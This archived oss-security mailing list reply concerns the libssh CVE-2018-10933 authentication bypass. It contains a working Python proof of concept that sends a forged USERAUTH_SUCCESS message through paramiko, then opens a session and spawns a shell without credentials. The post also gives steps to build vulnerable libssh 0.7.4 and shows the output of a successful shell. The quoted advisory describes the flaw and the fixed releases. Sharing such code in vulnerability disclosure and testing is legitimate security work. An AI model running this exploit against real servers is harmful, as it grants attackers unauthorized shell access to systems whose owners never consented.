Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Date: Wed, 17 Oct 2018 16:13:24 +0700
From: Minh Tuan Luong <not.soledad@...il.com>
To: oss-security@...ts.openwall.com
Subject: Re: CVE-2018-10933: libssh: authentication bypass in
 server code

I have coded a simple POC for this CVE:

--- CVE-2018-10933.py ----

import paramiko
import socket
import sys

nbytes = 4096
hostname = "127.0.0.1"
port = 2222

sock = socket.socket()
try:
     sock.connect((hostname, port))
     # instantiate transport
     m = paramiko.message.Message()
     transport = paramiko.transport.Transport(sock)
     transport.start_client()

     m.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
     transport._send_message(m)

     cmd_channel = transport.open_session()
     cmd_channel.invoke_shell()

except socket.error:
     print '[-] Connecting to host failed. Please check the specified 
host and port.'
     sys.exit(1)

-----

to test this code: get vulnerable version of libssh at homepage: 
https://www.libssh.org/files/0.7/libssh-0.7.4.tar.xz
after uncompress and build, go to example directory, there's a simple 
sshd server using libssh name: samplesshd-cb

run this simple sshd by command:
     $ samplesshd-cb 127.0.0.1 -p 2222
then run my code, output will be:
Allocated session channel
Allocated shell
mean that i can bypass authentication and spawn a shell without any 
credential

Regard, Soledad

On 10/16/2018 7:21 PM, Marcus Meissner wrote:
> Hi,
>
> https://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/
>
> -----
> libssh 0.8.4 and 0.7.6 security and bugfix release
>
> This is an important security and maintenance release in order to address CVE-2018-10933.
>
> libssh versions 0.6 and above have an authentication bypass vulnerability in the server code. By presenting the server an SSH2_MSG_USERAUTH_SUCCESS message in place of the SSH2_MSG_USERAUTH_REQUEST message which the server would expect to initiate authentication, the attacker could successfully authentciate without any credentials.
>
> The bug was discovered by Peter Winter-Smith of NCC Group.
> -----
>
> This only affects libssh operating in _server_ mode, but not the usual used client mode.
>
> Ciao, Marcus

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.